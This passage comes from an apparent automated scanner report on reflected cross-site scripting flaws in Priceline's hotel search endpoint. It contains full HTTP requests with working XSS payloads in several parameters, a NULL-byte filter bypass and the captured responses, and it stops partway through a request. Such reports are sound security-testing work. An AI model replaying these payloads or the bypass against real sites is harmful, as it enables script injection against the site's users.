GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11b5872"style%3d"x%3aexpression(alert(1))"291cab46a60d439a6&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:10 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001310992011591727; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A10&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8954
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkInDate" value="10/04/11b5872"style="x:expression(alert(1))"291cab46a60d439a6"/>
...[SNIP]...

4.121. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003a9fe"style%3d"x%3aexpression(alert(1))"7a2a0989c6a was submitted in the checkInDate parameter. This input was echoed as 3a9fe"style="x:expression(alert(1))"7a2a0989c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011%003a9fe"style%3d"x%3aexpression(alert(1))"7a2a0989c6a&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:51 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a201110030043518ac011586110; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A51&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:51 GMT; Path=/
Set-Cookie: JSESSIONID=9BC2147716533441EF0F5C6A3C231BA2; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8690
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkInDate" value="10/09/2011.3a9fe"style="x:expression(alert(1))"7a2a0989c6a"/>
...[SNIP]...

4.122. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ed36"style%3d"x%3aexpression(alert(1))"66b5847273a was submitted in the checkOutDate parameter. This input was echoed as 9ed36"style="x:expression(alert(1))"66b5847273a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011%009ed36"style%3d"x%3aexpression(alert(1))"66b5847273a&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003004415f6a011567632; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A15&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:15 GMT; Path=/
Set-Cookie: JSESSIONID=37A985B3F3388CC173B401D5F9AA8630; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8690
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkOutDate" value="10/16/2011.9ed36"style="x:expression(alert(1))"66b5847273a"/>
...[SNIP]...

4.123. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed900"style%3d"x%3aexpression(alert(1))"0b6b9d26eee29a0be was submitted in the checkOutDate parameter. This input was echoed as ed900"style="x:expression(alert(1))"0b6b9d26eee29a0be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11ed900"style%3d"x%3aexpression(alert(1))"0b6b9d26eee29a0be&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:17 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001417a14011745222; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A17&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:17 GMT; Path=/
Set-Cookie: JSESSIONID=F76E5D0ED24F9C3B783169F6F2A9E2AE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="checkOutDate" value="10/07/11ed900"style="x:expression(alert(1))"0b6b9d26eee29a0be"/>
...[SNIP]...

4.124. http://travela.priceline.com/hotel/searchHotels.do [cityName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the cityName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 730ce"style%3d"x%3aexpression(alert(1))"160bb80c2ba97e2cf was submitted in the cityName parameter. This input was echoed as 730ce"style="x:expression(alert(1))"160bb80c2ba97e2cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States730ce"style%3d"x%3aexpression(alert(1))"160bb80c2ba97e2cf&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001633bda011715075; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A16%3A33&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:16:33 GMT; Path=/
Set-Cookie: JSESSIONID=55AC5B68C9B9BF32C11F478F8BE2E663; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="cityName" value="Boston,United States730ce"style="x:expression(alert(1))"160bb80c2ba97e2cf"/>
...[SNIP]...

4.125. http://travela.priceline.com/hotel/searchHotels.do [homepage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the homepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5918f"style%3d"x%3aexpression(alert(1))"cadbe4bcd41bf55b1 was submitted in the homepage parameter. This input was echoed as 5918f"style="x:expression(alert(1))"cadbe4bcd41bf55b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y5918f"style%3d"x%3aexpression(alert(1))"cadbe4bcd41bf55b1&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:18 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a20111003001518a50011747590; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A15%3A18&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:15:18 GMT; Path=/
Set-Cookie: JSESSIONID=52ACF5E992CFB1F936B65D8A5FD32321; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="homepage" value="Y5918f"style="x:expression(alert(1))"cadbe4bcd41bf55b1"/>
...[SNIP]...

4.126. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the hotelBrand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7150c"style%3d"x%3aexpression(alert(1))"237f1ca6f05241f7 was submitted in the hotelBrand parameter. This input was echoed as 7150c"style="x:expression(alert(1))"237f1ca6f05241f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand=7150c"style%3d"x%3aexpression(alert(1))"237f1ca6f05241f7 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:09 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a20111003001909c56011718275; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A19%3A09&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:19:09 GMT; Path=/
Set-Cookie: JSESSIONID=3C154D773CBD3649F97FF826F719F01C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8943
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="hotelBrand" value="7150c"style="x:expression(alert(1))"237f1ca6f05241f7"/>
...[SNIP]...

4.127. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the hotelBrand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ff7"style%3d"x%3aexpression(alert(1))"82960f0a095 was submitted in the hotelBrand parameter. This input was echoed as 29ff7"style="x:expression(alert(1))"82960f0a095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=29ff7"style%3d"x%3aexpression(alert(1))"82960f0a095&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
